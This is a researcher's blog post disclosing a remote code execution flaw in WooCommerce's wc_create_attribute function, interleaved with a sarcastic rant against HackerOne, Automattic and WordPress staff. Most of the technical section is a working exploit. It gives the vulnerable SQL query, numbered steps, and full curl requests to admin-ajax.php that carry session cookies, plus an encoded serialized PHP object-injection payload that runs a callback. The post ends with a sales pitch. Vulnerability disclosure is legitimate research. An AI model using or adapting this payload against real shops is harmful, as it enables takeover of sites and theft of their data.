WooCommerce and Azis with scotch

Most of the topics here are WordPress related, written with heavy sarcasm, as only way to reach the ones who need to read and understand, instead to watch themselves in the mirror repeating how beautiful they are. Those people (I mean WP puppets who never miss a chance to give their boss compliment that he have biggest one) need to move their reference point of view from the one given by “Azis” after a bottle of “scotch”.

Azis under scotch, rdy!

Now let we focus on technical part and the RCE issue in current version of WooCommerce and after that I’ll explain why again disclosure and who is Azis the scotch lover.

Issue

As you all know, due the fact H1 as bug bounty platform steal from researchers under command from their JE shit machine, I had decided to go away from H1 until they put their “self proclaimed king of bug bounty” under control. That is why I had contacted “lovely” people from Automattic via email and gave them the issue. It is “unserialization of user input” that results with RCE in WooCommerce.

Issue exists in function wc_create_attribute and is caused by changing values inside string (serialized array in our case) out of the serialize / unserialize PHP routines.

--------------------
$wpdb->query(
$wpdb->prepare(
"UPDATE {$wpdb->postmeta} SET meta_value = REPLACE( meta_value, %s, %s ) WHERE meta_key = '_product_attributes'",
's:' . $old_attribute_name_length . ':"pa_' . $args['old_slug'] . '"',
's:' . $attribute_name_length . ':"pa_' . $data['attribute_name'] . '"'
)
);
--------------------

Technique for placing your payload in serialized output where manipulation of the string is done out of the serialize / unserialize PHP functions is described here and have many (not everything is disclosed) use cases / 0days.

Fix

Suddenly in two weeks in my inbox, developer showed up and told me that fix is deployed and credits are given.

Why this happened

I was full of questions why I wasn’t asked for credits information and why I wasn’t asked to check the “solution”?! I know the answer, I got it! When I reported the issue, some Barry over there wasn’t too much worried regarding the issue, but told me that they can’t give me a bounty, due the fact I don’t use H1. I told him to focus on the problem and to leave “bounty” thing for the end of the process… That was the last contact and then “fix” showed up… H1 platform put all of those program managers into some sort of authorities mode with knowledge that they can hold researchers as hostages due some shitty bounties and to do what they want… No my friends .!.

Vulnerability

As I stated before wc_create_attribute function is vulnerable one. Guide how to exploit this vulnerability will give you idea if you already don’t know what is this vulnerability about. On your local WooCommerce setup:

  1. In your /wp-admin/edit.php?post_type=product&page=product_attributes create attribute with name and slugwoo .
  2. Create demo product ( simple one and virtual in my case) — save it
  3. Add attribute test with value payload and capture the request. Will look something like this:
curl 'http://localhost/wpm/wcwp/wp-admin/admin-ajax.php' -H 'Cookie: wordpress_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7C4b8e2ff115b842870275a29e130279a35fc4a8880be9df869c4d0c65a8b6865e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7Cfe2b2f68b3d71bd4e9f60c5c6e0d2232605d43e5eaedad160193a1c423e656b9; wp-settings-time-1=1539119916; __ar_v4=DCRDZA4OZJCETF5N5YL5SU%3A20180321%3A4%7CZAMJKSSZRREUVAYSLZ2K6S%3A20180321%3A4%7CQQBLQGEK7FB4RBKP6CVHTS%3A20180321%3A4; _wpfuuid=3bc2a390-6279-4d85-8a89-3309ccd1f201' -H 'Origin: http://localhost' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Referer: http://localhost/wpm/wcwp/wp-admin/post.php?post=10&action=edit' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' --data 'post_id=10&product_type=simple&data=attribute_names%255B0%255D%3Dtest%26attribute_position%255B0%255D%3D0%26attribute_values%255B0%255D%3Dpayload%26attribute_visibility%255B0%255D%3D1&action=woocommerce_save_attributes&security=70d4636c87' --compressed

4. Replace the payload with the following string

s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22%22%3Bs%3A10%3A%22is_visible%22%3Bi%3A1%3Bs%3A12%3A%22is_variation%22%3Bi%3A0%3Bs%3A11%3A%22is_taxonomy%22%3Bi%3A0%3Bs%3A3%3A%22boo%22%3BO%3A19%3A%22WC_Log_Handler_File%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handles%22%3BC%3A33%3A%22Requests_Utility_FilteredIterator%22%3A82%3A%7Bx%3Ai%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22azisY%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D%7D%7D%7D

You will get this one:

curl 'http://localhost/wpm/wcwp/wp-admin/admin-ajax.php' -H 'Cookie: wordpress_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7C4b8e2ff115b842870275a29e130279a35fc4a8880be9df869c4d0c65a8b6865e; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_9885605d7e885262072a743d3cad590e=root%7C1539242989%7C5kmTl0sBjba6aI2qPk0Y2AuwwLmalX71vCaKOjUMDeu%7Cfe2b2f68b3d71bd4e9f60c5c6e0d2232605d43e5eaedad160193a1c423e656b9; wp-settings-time-1=1539119916; __ar_v4=DCRDZA4OZJCETF5N5YL5SU%3A20180321%3A4%7CZAMJKSSZRREUVAYSLZ2K6S%3A20180321%3A4%7CQQBLQGEK7FB4RBKP6CVHTS%3A20180321%3A4; _wpfuuid=3bc2a390-6279-4d85-8a89-3309ccd1f201' -H 'Origin: http://localhost' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.8' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Accept: */*' -H 'Referer: http://localhost/wpm/wcwp/wp-admin/post.php?post=10&action=edit' -H 'X-Requested-With: XMLHttpRequest' -H 'Connection: keep-alive' --data 'post_id=10&product_type=simple&data=attribute_names%255B0%255D%3Dtest%26attribute_position%255B0%255D%3D0%26attribute_values%255B0%255D%3Ds%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22s%3A6%3A%22pa_woo%22%22%3Bs%3A10%3A%22is_visible%22%3Bi%3A1%3Bs%3A12%3A%22is_variation%22%3Bi%3A0%3Bs%3A11%3A%22is_taxonomy%22%3Bi%3A0%3Bs%3A3%3A%22boo%22%3BO%3A19%3A%22WC_Log_Handler_File%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00handles%22%3BC%3A33%3A%22Requests_Utility_FilteredIterator%22%3A82%3A%7Bx%3Ai%3A0%3Ba%3A2%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A5%3A%22azisY%22%3B%7D%3Bm%3Aa%3A1%3A%7Bs%3A11%3A%22%00%2A%00callback%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7D%7D%7D%7D%26attribute_visibility%255B0%255D%3D1&action=woocommerce_save_attributes&security=70d4636c87' --compressed

5. Go to the /wp-admin/edit.php?post_type=product&page=product_attributes and change the attribute and slugwoo into azisftw appropriately, save.

6. Visit the product page /product/azis-demo-product/ in my case and you will see something like this

7. Yes it is RCE, move attribute / slug into woo and continue with store usage.

Attack surface

Attack surface is much more bigger and demo described in this writing is just PoC. Hint: watch the problematic query ;-)

Why disclosing this way

I wrote to the developer that fix isn’t complete immediately when I saw the released version. Normally everyone there were watching towards me from Azis with scotch perspective and were like: we are not convinced in what you are talking about. After that they got convinced, they were shown the path Azis with scotch always forced and recommended, but as you can see they are comfortable to discriminate and underestimate people from that subjective point of view, but are not ready to apply those “solutions” in their products. I’m really sad to say this, but discrimination, supremacist behavior and underestimation towards people based on their origin are main attributes that WP rockstars have and like that they are transferred towards their associates causing huge loss for everyone! Those attributes are just boosted with usage of the H1 platform and I had already explained that.

They send Azis to make interview for opera singer position

What do you think how he will grade opera singer?! Reference point my friends!!!

WordPress Cracked

WordPress from security aspect is put in the hands of few people who have nothing to do with security. They are put there and they got the attitude, same as “mad king of bug bounty” always protected by “anti-soviet” super hero, who don’t get things clearly, but is stronK. With this attitude they have fractured WordPress so hard making it NOT USABLE except in the form of publishing platform for one user. This is first writing in the series I have announced and this one presents WordPress vulnerability, known by the WordPress security team, but not announced towards developers… As always…

Promo

If you are wp developer or wp host provider or wp security product provider with valuable list of clients, we offer subscription list and we are exceptional (B2B only).